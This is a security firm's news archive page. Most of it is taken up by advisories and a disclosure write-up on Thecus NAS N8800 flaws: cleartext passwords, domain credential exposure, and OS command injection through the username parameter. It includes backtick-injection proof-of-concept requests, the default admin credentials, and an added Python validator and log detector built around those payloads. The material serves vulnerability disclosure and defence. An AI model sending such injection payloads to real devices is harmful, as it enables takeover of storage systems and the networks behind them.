Archives for January 2014

Cyber Security 2014

Our CEO David Stubley will be opening the Cyber Security 2014 conference at the Gogarburn Conference Centre, RBS World Headquarters, Edinburgh next Thursday 6th February 2014.

His talk will be on ‘Cyber Security: Setting the Scene’.

During this talk David will explore the question “What is Cyber Security?” Using real-life case studies, David will provide insight into the current and future threats faced by UK businesses.

More information on the event can be found here.


OWASP AppSec EU 2014

OWASP AppSec Europe is returning to the United Kingdom in 2014 and 7 Elements are proud to announce that we will be sponsoring this event.

Hosted this year in Cambridge, the event will take place from the 23rd to the 26th of June and will include:

  • Two days of training and a two-day conference
  • Three tracks, focusing on the core OWASP mission (Builder, Breaker, Defender), with an added Research track
  • Keynote addresses by highly respected industry experts

Update from Thecus

On the 28th January, Thecus made further contact with our team to advise of fixes to the vulnerable firmware reported by 7 Elements; please see our blog for further details.

CVE-2013-5668 Thecus NAS Server Domain Administrator Password Disclosure

Advisory Information

Title: Thecus NAS Server Domain Administrator Password Disclosure

Date published: 13 January 2014

Reference: CVE-2013-5668

Advisory Summary

The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI.

Vendor

Thecus <http://www.thecus.com/>

Affected Software

Thecus NAS Server N8800 Firmware 5.03.01

Description of Issue

The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI. Any user who has access to this page is able to retrieve the ADS/NT administrator ID and password. This could enable an attacker to gain access to the domain hosting the storage server.

PoC

Attackers can use a browser to exploit these issues.

Fix

ThecusOS 5 (32 bit):

http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom

ThecusOS 5 (64 bit):

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N6850_N8850_N10850_N8900_N12000_N16000.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom


CVE-2013-5669 Thecus NAS Server Plain Text Administrative Password

Advisory Information

Title: Thecus NAS Server Plain Text Administrative Password

Date published: 13 January 2014

Reference: CVE-2013-5669

Advisory Summary

The Network Attached Storage (NAS) Administration Web Page for Thecus NAS Server N8800 transmits passwords in cleartext by default, which allows remote attackers to sniff the administrative password.

Vendor

Thecus <http://www.thecus.com/>

Affected Software

Thecus NAS Server N8800 Firmware 5.03.01

Description of Issue

The issue exists because by default the Thecus NAS Server N8800 sends NAS administrative authentication credentials in plaintext across the network. The credentials may be disclosed to attackers with the ability to intercept network traffic, which may enable them to gain unauthorised access to the NAS administrative interface.

PoC

Attackers can use a browser to exploit these issues.

Fix

ThecusOS 5 (32 bit):

http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom

ThecusOS 5 (64 bit):

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N6850_N8850_N10850_N8900_N12000_N16000.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom


Multiple vulnerabilities in Thecus NAS

Introduction

During an internal infrastructure test last year, we identified a Network Attached Storage (NAS) device that piqued our interest, primarily due to the administration web page being served over HTTP and not HTTPS. Generally not a good sign from a security point of view!

A few moments later, with access to the device granted through the use of the default administrator password (admin | admin), we had the opportunity to take a look around the management portal, and in a short amount of time we were able to identify a number of interesting security vulnerabilities. Of note were the disclosure of the domain account in use within the enterprise and the ability to conduct OS command injection attacks against the device itself.

The device in question is the Thecus NAS Server, version N8800 running Firmware 5.03.01.

It should be noted that the default configuration for the device allows the administrative interface to be available via HTTP. This makes it possible to intercept and manipulate the traffic between a device operator and the device, so the credentials submitted to the administrative interface could be intercepted and read by a well-positioned malicious agent. During further investigations, we identified over 100 devices running this version of the Thecus NAS with Internet-facing access enabled, increasing the potential attack surface against this type of device.

Detail

The following two vulnerabilities were of particular note.

  1. Domain account password disclosure (CVE-2013-5668).
  2. OS Command Injection (CVE-2013-5667).

Domain account password disclosure

After gaining access to the device’s configuration webpage, it was possible to see credentials configured on the NAS. They were stored in plain text and were shown in the webpage’s source. The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI. Any user who has access to this page is able to retrieve the ADS/NT administrator ID and password. This could enable an attacker to gain access to the domain hosting the storage server.


OS Command Injection

The issue exists because the application accepts user input through the get_userid parameter that can be used to construct OS commands which are passed to the operating system. An attacker can use this flaw to execute arbitrary commands.

Proof of Concept

We have generated a proof of concept (PoC) to prove the existence of this issue. Firstly, to baseline how the device handles requests, we use the following valid request:

get_userid=1&username=sales

Which generates the following response:

{"get_userid":"1456","groupname":false,"data":[]}

Command Injection PoC:

1. Write string for user admin to /tmp

get_userid=1&username=user1`echo+sales+>+/tmp/xpto`

2. Read value from /tmp

get_userid=1&username=`cat+/tmp/xpto`

Response:

{"get_userid":"1456","groupname":false,"data":[]}

The response shows that we have been able to directly execute OS level commands. In our proof of concept, the string ‘sales’ (1456) was written to the /tmp directory of the NAS device. In step two this value is then read back from the file in /tmp, proving that we are able to execute commands. This type of vulnerability could enable an attacker to gain full control of the device.

Disclosure

Back in August 2013, we engaged with Thecus to raise three security issues. Since that point, we have tried on multiple occasions to engage with Thecus to help them understand these issues. Unfortunately this has not been successful, and the lack of engagement from Thecus is disappointing, with all communication handled through their generic support system.

The responses received to our questions suggested a lack of security awareness and understanding of the potential impact to Thecus’ customers. The support team also failed to understand that the issues raised could impact multiple platforms and not just the single device / firmware version that we were able to identify. They have also not asked any further questions that would help them in gaining this understanding.

After sending the following message to the support team, the ticket was closed by Thecus:

“We raised this issue 73 days ago with you. As the issues are security related, we would look to issue public advisories as soon as patches or workarounds are available and as such would prefer to coordinate any notification with you.”

The closure of the ticket suggests that Thecus does not wish to engage in any further discussion on the security issues identified or work with our organisation in the managed disclosure of the vulnerabilities. After this point we started working with the CERT Coordination Center (CERT/CC) to progress this issue. CERT/CC has not received any communication from Thecus on this matter. Details of these vulnerabilities have now been released as part of their responsible disclosure policy.

https://www.7elements.co.uk/news/cve-2013-5667/ (CVE Entry)

https://www.7elements.co.uk/news/cve-2013-5668/ (CVE Entry)

https://www.7elements.co.uk/news/cve-2013-5669/ (CVE Entry)

At the time of publishing this blog, there are still no security updates from Thecus. For users of the vulnerable platform, we would recommend that they change the default credentials and configure the device to use HTTPS only. Further to this, and due to the potential for OS command injection, we would advise that network level filtering be implemented to restrict access to the device.

Update

On the 28th January, Thecus made further contact with our team to advise of fixes to the vulnerable firmware and provided the following response:

“Thanks to your detailed emails, we have released an updated version of our firmware for units running ThecusOS 5 (please see links below) and will be providing similar updates to our ThecusOS 6 models within a month (updates for OS 6 can be automatically downloaded and installed via the UI).”

ThecusOS 5 (32 bit):

http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom

ThecusOS 5 (64 bit):

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N6850_N8850_N10850_N8900_N12000_N16000.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom

“Again, please accept our thanks for your engagement and patience, you have our sincere gratitude.”

CVE-2013-5667 Thecus NAS Server get_userid OS Command Injection

Advisory Information

Title: Thecus NAS Server get_userid OS Command Injection

Date published: 13 January 2014

Reference: CVE-2013-5667

Advisory Summary

A lack of input validation allows an attacker to execute OS commands directly on the operating system.

Vendor

Thecus <http://www.thecus.com/>

Affected Software

Thecus NAS Server N8800 Firmware 5.03.01

Description of Issue

The issue exists because the application accepts user input through the get_userid parameter that can be used to construct OS commands which are passed to the operating system. An attacker can use this flaw to execute arbitrary commands.

Proof of Concept

Standard request:

get_userid=1&username=admin

Response:

{"get_userid":"1001","groupname":false,"data":[]}

Command Injection PoC:

1. Write value for user admin to /tmp

get_userid=1&username=admin`echo+admin+>+/tmp/xpto`

2. Display value of /tmp

get_userid=1&username=`cat+/tmp/xpto`

Response:

{"get_userid":"1001","groupname":false,"data":[]}
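As an added example (not code from Thecus or 7 Elements), the following Python stand-in shows the defensive side of the get_userid issue described in the blog post above and in this advisory: an allow-list on the username before it reaches any OS-level lookup, the lookup run without a shell, and a check over constructed access-log lines for the backtick pattern the PoC uses. The endpoint path and the `id -u` command are assumptions; the firmware's real command is not known.

```python
import re
from subprocess import run
from urllib.parse import parse_qs

# Allow-list for account names: anything else never reaches an OS-level lookup.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")
# Characters a shell would interpret if the value were spliced into a command line.
SHELL_META = set("`$|;&<>()\n")


def is_allowed(username):
    """True only for names matching the allow-list (no backticks, spaces, redirects)."""
    return USERNAME_RE.fullmatch(username) is not None


def lookup_uid(username):
    """Hardened lookup. 'id -u' is an assumed stand-in for the firmware's real
    command; the point is the argv list: the name is one literal argument and
    no shell ever parses it, even if validation were somehow bypassed."""
    if not is_allowed(username):
        raise ValueError("username rejected by allow-list")
    proc = run(["id", "-u", username], capture_output=True, text=True)
    return proc.stdout.strip() if proc.returncode == 0 else None


def injected_params(query_string):
    """Map each query parameter whose decoded value holds shell metacharacters
    to that value (the PoC's backticks appear URL-encoded as %60 in logs)."""
    params = parse_qs(query_string, keep_blank_values=True)
    return {k: v for k, vs in params.items() for v in vs if SHELL_META & set(v)}


def flag_log(lines):
    """Return (line index, suspicious params) for every request line that matches."""
    hits = []
    for i, line in enumerate(lines):
        _, _, qs = line.partition("?")
        found = injected_params(qs)
        if found:
            hits.append((i, found))
    return hits


# Constructed access-log lines; the endpoint path is a placeholder, and the
# second and third lines are this advisory's PoC requests, URL-encoded.
SAMPLE_LOG = [
    "GET /PLACEHOLDER_ENDPOINT?get_userid=1&username=admin",
    "GET /PLACEHOLDER_ENDPOINT?get_userid=1&username=admin%60echo+admin+%3E+/tmp/xpto%60",
    "GET /PLACEHOLDER_ENDPOINT?get_userid=1&username=%60cat+/tmp/xpto%60",
]

if __name__ == "__main__":
    for idx, found in flag_log(SAMPLE_LOG):
        print(f"line {idx}: possible command injection in {found}")
```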

Fix

ThecusOS 5 (32 bit):

http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom

ThecusOS 5 (64 bit):

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N6850_N8850_N10850_N8900_N12000_N16000.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom


ICO issue BYOD advice


The Information Commissioner’s Office (ICO) has recently issued advice for companies with regards to BYOD (Bring Your Own Device). This guidance explores what you need to consider if permitting the use of personal devices to process personal data for which you are responsible. The ICO document, “Bring your own device (BYOD) guidance”, can be found here.